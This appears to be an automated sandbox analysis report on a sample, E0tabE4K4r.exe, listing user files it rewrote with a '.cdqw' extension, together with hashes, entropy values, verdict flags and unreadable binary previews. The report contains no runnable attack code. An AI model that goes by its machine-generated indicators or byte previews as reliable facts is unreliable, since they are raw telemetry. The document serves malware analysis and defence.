                                                                                                                                                  Preview:{.".T.|N".r^F9q.M..._.b5......Y|BIq1.....A.L. s:.....-...>/..;......0%...4..Z.*{.....k.iK..]....DF.V.N..vm.v\\Vw*.2^.jQ..z........@......:u/.Q..F}.z?..-.Oy.C..$0SP.w.4If..b..A...#~.~......*..2.B+.V.?.....x....I.K.&..}.R...[N.......f-...s..I.}.....v,0+..&/.;(`!.y....,...i2.O.@.>..$D).....z.$~&.i.{...B.....=#...oH..,...{"..........~.?.7..)..&.~.h.....yF...B.........)....O.,.=.....#.TZ.....^Mq.V..].7|..l....2.(.n'....Izy...f(>.d..T.i.o..X.k.1ou...\./..$iLw./.J..<Rdf-Y>.i.5..YP._.>.u..=...Z.>.I..x<.O_t....y...W.r..-.p\hp]..d&.m..$j.u..........0D.....o1aZ..kU.},.a.J.f.zEI..i..i.2......f..l..R.r..J.o=.Du..}.......#.(.o..UJ.....B...=.J.;..o3^~b.xk...x.!f.n......x.E=0.$....?.LS...:...s...5...3bJAZ..D.M..3_.7>iY6B..F.'..w#..ic...(..o9./.F....f+.$.o..E$..-....p...%9.|Dp(.b1/`..t.[..J3=..*.zX......]^..S...0...5......V...............fX0l.i.I.@...b.l........{R..T..=..^....W.:..OO....p.w..(s.-....!....}......H>............x..R...Q..Cp.H.$L.ar.....34>...E/.!.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\1521f696d8626c8e8127c0284ab987ff1974f39a.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.937432464521145
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/b5yha1gEHhzSTe/Qp5Bzs2jBSASUFpqOssmq2rFcisi4T7NfQsVAD:/doE1SXzjY3UFtssQrFzAosVc
                                                                                                                                                  MD5:8EE0AF5FD4FE77DFC8CECB3C7BAB1957
                                                                                                                                                  SHA1:97DA61CB8205D88C3DF7642836359DAD013E96AD
                                                                                                                                                  SHA-256:661CBCEA8159268C0FCC23E58E94D0CBE76BDE43DE093407805A2EB25EA01CEE
                                                                                                                                                  SHA-512:F532519BF5A734EA9D0B09E599DAAC14668EB0E3FFA817560E2F45FE5D7895EE537CFCA4590A5FF7991EDDE416E28A2F32821477B7717A4728134A15123FC2BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T......A.....I.Kn.v...l...L{.ZX43..~R..&+g.x6.B...6.V...6p......xK....gxA.1.....EDU.l$.V...5.Z.|K]..k!#Q...y .....~.RM(..]aa@....;..D.y<.r>....>.8..H.cK..D.1R....0..xM$.&.N..Q...u..v..5...}..`X.K.e6Jq.~.E..vq.e.....U...];..!...n...<...c#..`\.``NB..$`.k.V..m.......!.ME.S..)...H..Yq...`...!...1S>...D..U0.>..PWmm...d...:...7.........8..h."..F.t..U0.`z~..._b.....u..3OFZ.i.ff...*fG;Vz...s.........M..Pdh2.g..5uIX..X.yL.s._...WU3...P.+#u.....-4.Qv.....h........\....%1|..p5....D.(..B........?...(sY3Y]..Ur.=...a^..%..7..S...O.9.V.\wa.14....%$........-.iV...rT....k*T..4..z..e1...2.o ....:1.X....s...B}t....X..S`<..(.{..8......}~.0..Y@r.......yQ..Gwf.=n....\.>.Y.."..k.IV.O...N3z...=.y?......]~.Pn...*vw...[C.rd..g.`.d+.R....:...6".v.%.....n...P$.....J...?..z.9I......P..{.^......I...W..0..s.Y.....p...J.+%ev...L.......4j.l..V...p....q).C.'{8.s..;c....V~...f9].-./.^......(.1..p.&.........P...q..Ob.q..Z.....=.8F....Pk...M.@_ev.6..(.&....H...Y.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3018
                                                                                                                                                  Entropy (8bit):7.934328193252267
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:EFGpxiB80QDtP3BrYCctA31XcqlBwV1eoUYift0sqaOv3Fqgk3ENUIfMvhk2roDH:8GLiW0QRfZYBt+1rwVwlYifmPdfG2DkI
                                                                                                                                                  MD5:9D6CD382272ABBE9181429D6C48D8CA0
                                                                                                                                                  SHA1:44E1B9D9698A6ECCE9AED2EE54C6CF1C49B3ABBB
                                                                                                                                                  SHA-256:BEF57C69C391CBCECF6FD1D3849A9DBB11EFDF70459AA5A76C9A626239785C1A
                                                                                                                                                  SHA-512:9B6CAAEF57E6A069D459A93B4BA4CBA5AA9DC931CDA31AE9109F9E57DEF9F7326A2454BB8CB73BDB735F577CB098776958BC3FC82909B8A8ED77496E2A8BE253
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".TC....|..C6..8..k]......a.Y.z.S....ow.%.V.N,h....v.#.Cd..Hm.,c...-./.l......L..x....e7...T..g.-.N.......1.Ni.Mu..5.r H.Z...<..@...h.....\bbxqe.._Q.....IMg..w..=;q.}3..3.(\...c.`K&~..>...l....|OA..t..|Y.u...Gn..F...a.tI...7R..G>HNd........."w&`..;.L.k.V.....*.OD.d'.W.E.....v.1..z\\..#....!Y........U.t..*....n.$;.>.97.VO.so...C..].b..c.#..G.....%.*..X+P.."IX..-V.z.....*....~......l.0...o..!Jk.}9.}..?.f.....}.".\.B..6...F.H.I...D......Uy...:.X....w..gXmP......"0.a...`.MY.W.GZ[.[..y.(WH..LI..?..B..].......rQ...U..$......R.h`).j..|...J..........(~|o..Q0}./....................\.......t0.O.w..,.s..zA......p..M<.h:d...S.QtX.N...$.n.`...f0.......P.9.......L.].>.Wn...V......{wy<.....R....@x.I.B...w...l./oq......R..u.u.yo.,...q~...9..h(b..(..U&.j...`.L..-..'L.(....}..b..7O.F..,......O....!M.......{...8..A..;......J$m....MO...\.H.3.V....%sb..*6x....p...I.h.q....M......d.Y.td...#.~a.]Fs.......L..b.0F....M..+.V5.t..'1..[#0....f.U......'.S..3ky..j.D!...

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.921144084658078
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:maEEeWB4jbaElyxX2Xmp/E4OlTg7v2XMMhqr8IeTNtmHBNHoGxr677AchRDQgqhl:vjXB4aEl7Wp/E4OcANIeTNtctoGx8Acm
                                                                                                                                                  MD5:FDE296D3ADBBD4B574E4397CA0A7198D
                                                                                                                                                  SHA1:A6B2111878197663F979F1B5358DFF8C9D067560
                                                                                                                                                  SHA-256:5A654FA15D719DABD5CE031C20A59F28A98A364EFAD9490573407DFDA18F8A2C
                                                                                                                                                  SHA-512:05158B1319665F6EFEC814DB7608C8F1966CE13817E1F5A65B11F6C8F03CF03FFC2A0A944400B442E06327866041E2DAC3E0CE43C5A6B60B9B4E56303121C596
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".TU..o+.9..4....,..........zds..u`=...i..).."....|.....d.rA.A.U&(MG3.f...gr.NTP.S.....0.....Z.5H....A..gU..Q=V....Pw<..X...*.T...}..........6.t.g.D....59.qF..M...J.+.M.....X..OZM..).J...Yg..A/.....As....1..D..<.7.K....~M.b...~?Y):.J.}-iF.b.c..q o....q._.nuU..Tc....$~...>/..{...@....|K.!G.n.3..t...<...x..M...#..Jv...U..:\h.h..HN.&.k..&.=g..@.7.0M[L..a@.....K.\@..I.9......z..<.H..{.U...2..r[`.... ..R0q..LH...z.....x.D.....i.,.*oU....C....N.0.n...I.J..8..../.(.0.I....UQD..!.7..Y.iq..Pt.'..X..*....O.....r..y.c..An|-.s..8<.. MS..^...z.Y.....x.<...t.(n.....D.....R...6.L.w*.R.M.>.FC._b&.....9.......Yb~..3..(+uu6. .:..-...|..<...~(......'.A. ....bw...!.%......e....iq..$X..(.I...A..7[..4.........N.g..L..I..,......i....1~\i.b.=.g6..%.QJx6.>.G...4$r..!......p.Q.:*..[y;.g...hM[v.BW.........Z.t.u."Rr.... 9.KO.|o.....N....7.K.|..zfT..j{..S.HC.......9.9...(!c........f.F.c4...w....@......7).I.4.. ....,..c.y.......l....}..q..X{.}w.....2.~..

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4956
                                                                                                                                                  Entropy (8bit):7.963379825724958
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:u20HWxN38knb0b+rVRI9/9MEjDz6+9OhJA9To26KxKNGrli6MmGw/kCuhtUnD:rB8k4yVRI9/9MJ+qFuKF6zZsCysD
                                                                                                                                                  MD5:58E2AE83E86D19027EC3FE5915352793
                                                                                                                                                  SHA1:30A5F790F776FB0E0B3E7E1540D978198F332D70
                                                                                                                                                  SHA-256:B9670BF01DF80BFCD21752AC1980A901473CE9E442B5A03ED29839DA945C4EC3
                                                                                                                                                  SHA-512:B55B9953E12F6A1FE6C0268739D49AF9CD3C8E2077618208C5D0017BEE3336150F0D0E4827817D5001DCE83534308259D1F1A35C126B231EB022AF2EDCD2173E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T....1........@C.c.....e}op.=..`....=O0fP.[.#m).O........6T..H/..M..F_...........SY..9.-....K.Xp.s...Y$.<.u8..z.l.3.^f.L.^.S....-..B.MD...j....F..;O...{.|..m.....YXJ.I...^i7....O.B.%D...r....T.*.QJ*.}..&M..@JJ..z.B!..Q..RI..2)s..^g.....dW=c..6...1....)<k...oVl`<Y.G..OC.....I...j..t..\..9aV.Q..?..B..YO{.H..cO.A....k...#2...'......y"|.q{.>.[.<.F.nW.O..O.b...[l..fMO3......]...... .g.L..|.)T..=.J._.6}..x...1.B...<$D..+.L...!.d.....f.}.W..w..._..e....b.PQ...F...>.`....N.fH..xD.,.8....,..Ez....i.R.C....2.NKcp...Js.Cs.#:.......E._...h.[..x..W..7.0......^G.P._.).c&%3`.LD....2.\.4....G.[...sg...4W\..rk..7..0....c........H.>$.........#.9..a.///....b.Z..u.A..y.H\J.....K.F......1...rs..4..{...+.!G+..nn..O'7.&]......e}..<E...C.).0...x....q.S...a:.dl....>4....h,.....).9..M3.-^+.&0h....d".N3..2...R%..-=...".x.d..At/Tmz..h......bD.0.....w...n.Ez.......[.....$/........[G..T..2......O...........c..R5.N..:...'n..(;...Y..{z....I;.."|..4....{-..

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3018
                                                                                                                                                  Entropy (8bit):7.937432171409745
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:s+nlHc7YhkdR9JgdDTXCUQ98wMkrX7LKdHsB+K0cBgi9WMv3/O6udfiRjDsVtu3O:Pa7Tr98TWX7mtsB/0B2262fiWHuEQcbh
                                                                                                                                                  MD5:BD4445F38E0A6EEB04B39EFF202AD56F
                                                                                                                                                  SHA1:4A04452296B354472DAFD64358CB07FA7F672E59
                                                                                                                                                  SHA-256:155DAA9ACF5D06723742944E3EBC562B71173333B01367CFCF2204C74A1AA9BC
                                                                                                                                                  SHA-512:B52D28753ED90BCC1E9471353D7E4C9DA99600E68093AB5836690E14DAA89AB42AECCD7F6F1C098AE42673DE2835C49BC76E3EE01EAEFEFA8374CC62C53FA075
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T...DXB(.#F....,(.s..V..e.Hq.G."B.7...&..Q.::....JU.W.4a.S@.|.....@.io'..@....^H.].....yH0%8....K.b.....t..q@...&N.PN./.3P6...U+.b.v.!..w.w.a&.W.(....8:{.<..w..8........o....a........,..p9.-rC..}n6y"...?....g.....;Q.D5R.{...6.}...b4t..Y+..3..(d.1.....{A.%..;....K..t!..}s....,......n...S.../A....PF.y.E.^kCd^w'.#...o....`dPe/.Q.DNRS.G...!..I5.+.\. |.;%&h@8n.kL....;...?d.F......us......S.B.gkC0...4,d.......cK....O..+..._@|.......!..&6pu".......,O..G....&.v.,`..,...Sr..g........U.T..=sI.\..bv.C...,r7.@z~A.3..A..b..UE.1..A..^..........o.cI.r.........*.Ya;.l.=..E.#+..._<.+yN....g..n..J..;..H..m..>.....th.>.....+...;C.Ldm.).....a.R..R2....-Jz.>.#0Q..../..1r....R$Zp5.>.$...g..=K.!sx..W...~.x.&..H.....q..c".E.b.~..~.[B..2!......2....Q...,..27[.h?.$\>DJ...`.. OI.Z!7.X.fv......c..h..:..C...O.....Cth.g}..u...9..v8*.......0....p.f.......+..`eY.L...MN{...vz.....82.....Y.:p.a.x..<.|.#'.t|.c%..b..#|.>.=x..V.._....a.+.}ns...]w-.i.Tv.@.e.-...?..

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\f036564d8b727dbe99499799c7e51936a642f62a.tbres.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.932970084379917
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:RjMsUmcrpW0I3On2lvJ16cPd2tl++/2dL+LD:GtmcrhI+2lbPPdsl+Acy
                                                                                                                                                  MD5:D841F36C3A529D0C91A247E33CB1F63F
                                                                                                                                                  SHA1:BF3725AE8EBD1D84C063BD3C4A07FF92533D66FE
                                                                                                                                                  SHA-256:6D40AB8DB9F54055B3A361C1DD961EC526AE0A559B76399A02F128A5112771AF
                                                                                                                                                  SHA-512:E51C24AB041084A02EBC851A2694788C949DDD961715CF67FE7DEF3071EFB1541EA5DBD4515C7AC7087088B8C9C5B4801064A89EF4A5700062030F2C28354B71
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T.J.N...6F.>..:...F&.O.....x........J.E.%t......)&...\]"w.....u.i|..@-b.9.(A#).DkX.|cNN.R:...~\[..O.c..5.SYQ.n..........z.....4....._x.}......g.)w.ba.......H..dL.......Y...J..AC..B..u.....S..G"u/._0rKFn^....a..iX...p...Q....GM....@).........?.).Pk.....=h..6.|iJ.&#.....1..$.40.ksixi_x?k...x!<.E...N`..........Nly..... .~...W......).?sc/C[*\pFrJ......x.c.A.;.....F.....M..{~...zr.4|.....C.0.....].@@..c.._z...5.1...?m....r../..P....pZ. ..J....N!.l'}..K1j9.Z..#........>H.xP...A...)Mw.......&..W...}.......y.+.v..sJQ.=z.2:U...O....f|....:......z..DS.a=O.a.T.D...8o.....zM....zu'...}.....omn.Q....p..1..w.....'t~!.._....;.........>+..N_(.;.......~....3b.. #.?.QA.....lwn.'V65l'.a...n.TM...]...k7...4.'.\.....Z.i.....%.........Z.5.:.{.}...*..]f..................-P.,AB.....M.XDEiZ{p...p....X.5.......y.0..$..=H.T)...+.K=6.2.p..w.......k..%q.=`...,Ip..J....a^....p.2...h;....!.b..$8+.[V.gsy..dvj..9.Q0#..h.w_.C)Y..[*.K...~.\.....

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):770
                                                                                                                                                  Entropy (8bit):7.7440740996313755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:/w2PHouDtieP6pMkU+ICZLlqp5NZEN9S/j7OlG22bD:/w2PHo+tieCpHICZwZENU/fOlyD
                                                                                                                                                  MD5:988872E400D81B59F50607D1C2E0E561
                                                                                                                                                  SHA1:FE6511EFCD8FEC11602E636BE95AECB8561ECCF8
                                                                                                                                                  SHA-256:A63714051F00D427F5DCF671F533C31BF7EC40BB57B097069CD2015B8B6F183E
                                                                                                                                                  SHA-512:D4032225AB29461405246CDA9FB9BCC453092E04CA9774958954AA20701EA4025DF5B9333E1C7FBD343A5F9537BA3BFCE2D7268249FC238626C1ECA1642D15CD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....Bf...S.._.S....%......M^..M..2..Slq.,.=.Z.....&..yR../...,.P.l..........'...l.y..Q.._8.......rSw`.........+kPY...@.3.r....TN.m...^.y......v.....E....P...z.2.o....5...W.Pbvxpn..MUD..Y:Wb....KX..k.........%.....n8........Q.T.).#...z.....y....*T.....c/6E..........H.]....=..V."TKJ.IE..[.%p:.0.jA`....l.q.u#Eh...s..X.D....Y."..2..1e.5............n]..?.L.+.0.e.q.xo7.=...^J......[.:..N.....4.:0..\?....~.Io..96.T.gKGg..W...:...Qg..k*p.BIWz.zv....j.Pf......s=...?N...3...Q;dhF.|. [..i|.m.i.5\....JbI......B.~.....v...s..DP".~........Up..lLH..+E...?....S..#z..T..4..-....]cE...M..'%..&..Z@...l%j.o...vLi...sWf.......-D0<w...g....T)ZQ...BV.^..`..=KkO.(...2[.dT..+b.!mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Windows\2057\StructuredQuerySchema.bin.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):424152
                                                                                                                                                  Entropy (8bit):6.332111073068895
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:2ZuLlbUWdApEomrGtbVadt9Dtm+vyJfbnQkK96B88yKv4bWTmTvEiLSg:2qDeadHtm+6dF4/T
                                                                                                                                                  MD5:0CFC25063852FD8E5443D300F47A0D9C
                                                                                                                                                  SHA1:9ED71D408AB9809D47601636A32AEB87D9ABB805
                                                                                                                                                  SHA-256:5065D60BFA64AD37F2294B2A56B7495ED295AF948F23B0CD92E2F67E71914E49
                                                                                                                                                  SHA-512:7442828D8804B02C99DCBE74902FDCD360747B7DB49DCD220E253B47B74350B1FED7742502087661C8082E841F83C8A37008393137DB8EDACFB16C084907D937
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...P..C.A......pE.?..?.5R..m.....E7.?/<I.2.W....%[.%.%..P9xa5..p..[..2b..L..~:V+..l..............H/.....3d.......7w.Yju........Z<..!...Zw.x...DI9A.*..R..?../t.q.....V.o......1K.wW.....,.v.h..D?X.j......K..l.G...O.{<.r...(DT.~.{.Ub......1......,..*...^W[.....e.dp..:t...Q...9.[.ub.i#4.......V.S..{It.V.;.4.s=.0.a^.'=..losk...D@~..dW3WX.p.../.8.,z.&.jZ.......V.K.N.Q....i ..3#.r.W..T.....k.k....s...eK......Z.=4.=^8,.2N$....*'v7...e......c.`o.b.c.......t%.d..'...@r ...`.s;...]^..#..."..oj.F*..O.ZJ.1....0xrv.1.(.M.. <.R..b....8........^..4.3......G..............-&v.....!.<.G}.'I...u.w.Y..m....S.o..RV.4J.......A....P.n.X.7I.K4...n$' E........A...`.Y#....[..}.I..f..M...*v.v.....-.7A+..E^.F..... f.z....f......(V...7UA..`I.{...v.~(...;.k......eR.8 ..... ...r0......*.z...>..x...!zq.?%.e.....cU..|8.........b@.\.0-9."^..I`..Vm.......cz.....^pcA..!t.%.WG..b.!.....o......c...8.[....-.g.,. N..F2|....?.X.r.....[.....%..z..=n.........n.....i.....3C.`...@0../.

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.988128282980794
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:HtUyTyQJswuWoPIK72vy6Xxt+iFRG+X7iAzX2iUfNJdFOyb:NUle1oQTvyOx9ZXrUfNJdsyb
                                                                                                                                                  MD5:08B243C1B65C6EB20AB8C5BEDDF6AD5D
                                                                                                                                                  SHA1:DEDA437E511741D0AF17B1E22465C66825DBCA96
                                                                                                                                                  SHA-256:967EDD5C5977E08B7EAEF23646B1B1394CCA30C07421F017172B8C168A02E0D9
                                                                                                                                                  SHA-512:6C3388A4DA6CEE3DCA00F6EB0D3F5932D7E0585BA4E6BF7F43109C20C0DEA2E64CA0AADAA6A9E9EC1BFC0888D4D867B89716221167DE5EF1E588049FD4BF5737
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... .\..?.f.q..y.....~.q....>.3.B.....b.....n.RR...E..7....T@..l...d..an..@..q........*.....x..+..Y..bp.....)Y8.f..Va.F.,...XP:C..........)...N..z.......j.w....Oa.........w.u.b.t.....y...Y.....i3.<..0..`......f...f.3..G..G...X....$F..X..b..mp).Mz.$.?/\.74.r....5vX.R.p.0....{.d.. qT'..<..s.f`..(.w....T.}a.'...Mzj..yJ.....1....V..../%..'..VE.....Mp'..w../..zJ.Iq..$r-.V.x2.[`-...cP%.X...vV.r8=g^2..I.A:...Ks.......{..g<....#.Af.%..3......~.B.@..%..Bo.....q.$[........E}.....Yo.aK.nu.$K.i.=O4P..U..q...Q..^.....!.Ug;....v.B....7K.b.I.g.>....Q.....!....\.`..h8:..0....M.."..{l..,.......5...AF.....").v...Br.T........u@..........7.%....../.z.Q..9.......|./3.......t7....J(.TS......ms).....1.M>....V.:....u.q.D....I.>...lr.@.....A......../.)..4(...T.HvG...tl.;-..,.`2.cd..<.tE...z.........n.2'.2...u..x.5Y=c....I..k..gd.@.8..s._.d..J....{.....=j.........VwOW.9....nG.h..1.......8..^....[6k.7H..j..=.so...Y..s..hs...m.}$.......G*!..!.h....^8..?.L.}..9'.j

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.3.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.988385252481199
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:IxDKGbbc0QH2+xoOZj5lJ/WiSZpDl7TG/jxkTX3Raw:IIG0W+xoGNz/4lTAjKn
                                                                                                                                                  MD5:757358C9C7D708642676FD711452E968
                                                                                                                                                  SHA1:B14B944ABE34BFA5F33B7C94C12BF6DD2D264C3F
                                                                                                                                                  SHA-256:BE449CA74DEC6B0DDF53187473A57412F82726946658DE5F68963F0978B3A64B
                                                                                                                                                  SHA-512:66C2F795ED0284248E56E1AE6C95BFB201AD9838610492D73F30873F7ED0198D5D0E84E804E80B2021464BC4DFE7F7682571F1A31BD0A42ECA005C5BCDE0FE72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....`>0........<.8W.|..6..3tI....:.).k.yG%K2.qpa...cS....E..q{s..Hs...K..p....}...$......~.&8+.........-r0......g.....N.S^+~}5'0.:..,.f.o....d...J..Y.o..Dd.46h.n_<.l..aS..d..XE}2.1..:.r...h.T...-0..*1+C....H..S.x...<..D... K....I..Yj...>...9.......h..K5....r.E.S.'[.Xt.....&F..L..(_?......A^-D=b.T}..|.'...6.../..b.]N./{.n....&..C.@.o......"..n/.0..Z. _........yRw...6.R.8.b.K..F....? .c.~.o<S...<v.'m.v..C....-.F?.#...G..52&..*..%F.[.Q-.U..._v..8.\.............K..K.`..Rc.W.;..+....k....B+.6.....(Z!....I/F..[G......\..}(7Z..g..O.5V...mAb.*r].j.B....8b-.E.#d...8.....-}R.&.Mw.'.6.L.{p.b..a.j..P%..F....KL.3..'4E...8..0.6.p...y...6...k@.w..g..-'.C.n.+c...ikE....-D...,....g...3.iM....1.|.g....\...[j.....0`.1.X0h..QZ...jG._.JZ...$C.#...evRk.n....qAX..I.Dg+d.S..Iw[uBp.i.{1Dw9...h....x.V]..S M....1k.n..j2..7..o..d....e...m...3.......ih......d..v..}..1.\.....?.t8.s..E..G....N.V......m.....6..p..4..|f]...*.C/....AN.*KI..+.{...4_M...vT.g1....

                                                                                                                                                  C:\Users\user\Local Settings\Microsoft\Windows\Caches\{20001B34-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):424190
                                                                                                                                                  Entropy (8bit):6.331715924624306
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:7JtYHcJ1pfPQiualoVkuhm+vyJfbnQkK96B88yKv4bWTmTvEiLS4:74ORGalUkOm+6dF4/r
                                                                                                                                                  MD5:130B15905F023B64DB25B546758D155B
                                                                                                                                                  SHA1:82553980BD938050BF7C2460F3128319FFF5777D
                                                                                                                                                  SHA-256:4DFA779B37DC3A9E3469841257446838D5312B1AA609995612099F0B557BAD0D
                                                                                                                                                  SHA-512:C18F65276344B5AFF7B70F6991D89802DB3CEED6870674C9EE93B3B87BE5EC1BA1EFE943562B59CAE704D89A5EFB1BB744F48BDEE2F0D7F70921D16A88BB4F4C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.w.. ..-..4H.6.C.%ai.l.G.S.P!G.I=&.#.L.Ao.h.........K.p...... .ADg...p.]h...........5v......Pe.U...^...,..|.*.l...D.EV...xG...~..=n4..a._.'.}..wKb.....^| G..........Vf..i;..d..]6......-.C...Z.\...v|q..Z.....g.j|.....UA`.s.)...|<.r.o...J..QZ.<.*".71K..{....L.!6O.-..o{.*.y..4.}\...gS>.B...=....j3..x......i..?O.:.....^.D..q.|.Dwp.O{.<N..D.Yu....L.98.}..".{^.@...:1.8...N.m....Tx......0......a^}?K.?1......)<.k.1.n.m.!........n)R.F..P.................:b.H. .....-.h....z_...:.../........G.Y.......R.<_.....s.....d...R.w~.&b.Z`.4a...|IwK..a...(...g...W....#...Vy..mN..o.f.3Y<Jx^*..].g.2%.7`Y........"...[\..:.!W#.7.a...N..pWxk.C..:.r...b.)...:K..<.q3El..3.Fx.U.9..g.3.6..R...2..3.VW.C...s... ...c.....5...7.y........Uo..=B^x.......1v....=.P8.No*L!..<0...'..'.u|H.q..q..|$..xu...M....D.:95.@.&.2...^X...}P:.........\'.Y..........{t..j.".&.N...K.U.....n..Hkkd.=....}.>vV,b3.*..c...D.....k...S....s..d.h..S.Q.a0}...`....|/..FQ..w.....c....Z...N%.V.4t...

                                                                                                                                                  C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):30179
                                                                                                                                                  Entropy (8bit):7.993559128361054
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:UpR+AujeXwI8Dv0yA7UXf9rEbffidKxB6Dilq9RJgOXZ3X:07wI+v/WnnidK/6Sq9LgY3X
                                                                                                                                                  MD5:BD8FD2A187E31EBEC60BBD4C2784FDA0
                                                                                                                                                  SHA1:E9066FAC436808B1C0F70B1ADB163A2E55FB9A76
                                                                                                                                                  SHA-256:F3764C74518463A3D6A4C7EE6795D4BE40ADAE4BB33D98F82C8A00D8783B3151
                                                                                                                                                  SHA-512:154292E0E2DD284B7F898C2973406C7CCAD9E941CC4BD27027BAED937DDD64DD82EEA1BF16840C9B769F19F290D0879A197EE93EE475E1DC0AD26F59BC4FCC63
                                                                                                                                                  Malicious:true
